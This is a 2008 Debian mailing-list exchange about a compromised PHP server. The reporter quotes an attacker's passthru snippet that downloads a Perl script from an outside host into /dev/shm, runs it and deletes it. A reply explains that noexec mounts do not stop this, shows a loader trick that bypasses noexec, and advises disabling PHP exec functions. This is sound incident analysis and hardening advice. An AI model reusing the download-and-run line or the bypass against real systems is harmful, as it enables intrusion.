Hi Luis
You are abosulutely right!!
Just tried a test script at /tmp, it is running. So there is not
much point to mount the /tmp /dev/shm as non-exec.
My misunderstanding of non-exec has been there for a while. :(
thanks a lot.
Mike
On Jan 3, 2008 8:55 PM, Luis Mondesi <[EMAIL PROTECTED]> wrote:
> On Jan 3, 2008 6:18 PM, Mike Wang <[EMAIL PROTECTED]> wrote:
> > Hi folks
> [snip]
> > http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
> > passthru('cd /dev/shm;GET http://www.radiovirtual.org/bb.txt
> > > bb.txt;perl bb.txt;rm -f bb.txt*');
> > passthru('id');
> > ?>
> >
> > the /tmp was mounted as rw,noexec,nosuid, so it cannot run.
>
> nope. See below.
>
> > but not the /dev/shm, so the hacked script downloaded to /dev/shm, and run
> > from there.
> >
> > what kind applications are using /dev/shm? I googled around,seem not find
> > much information.
> > right now I mount i as rw,noexec,nosuid.
>
> A lot of stuff does. /dev/shm is recommended by LSB if I'm not
> mistaken. I know a few apps who use this (including my own).
>
> Well done tracking this script kiddie.
>
> This is a very stupid hack.
>
> By the way, noexec doesn't buy you anything here. perl bb.txt
> should've worked no matter if /tmp is exec or not. The way I see it
> they both worked (/tmp and /dev/shm). And besides, noexec can't even
> stop executables anyway. That's the stupidest of flags for mount:
>
> $> /lib/ld-linux.so.2 /usr/bin/printf "%s\n" foo
> foo
>
> And don't even think of making /lib/ld-linux.so.2 non exec or
> something else... Your system will just break in a million pieces ;-)
>
> It's time to tell PHP (via php.ini) not to allow any of those
> functions that allow executing stuff from the system (system,
> passthru, whatever).
>
> Also, you might want to consider using Virtual Servers (Linux VServer,
> Xen, vmware, etc).
>
> Hack me once, shame on you. Hack me any other time with the same
> stupid attack vector, shame on me.
>
> Good that you took time to report this.
>
>
> --
> ----)(-----
> Luis Mondesi
> Maestro Debiano
>
> ----- START ENCRYPTED BLOCK (Triple-ROT13) ------
> Gur Hohagh [Yvahk] qvfgevohgvba oevatf gur fcvevg bs Hohagh gb gur
> fbsgjner jbeyq.
> ----- END ENCRYPTED BLOCK (Triple-ROT13) ------
>
--
Best Regards
Mike
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
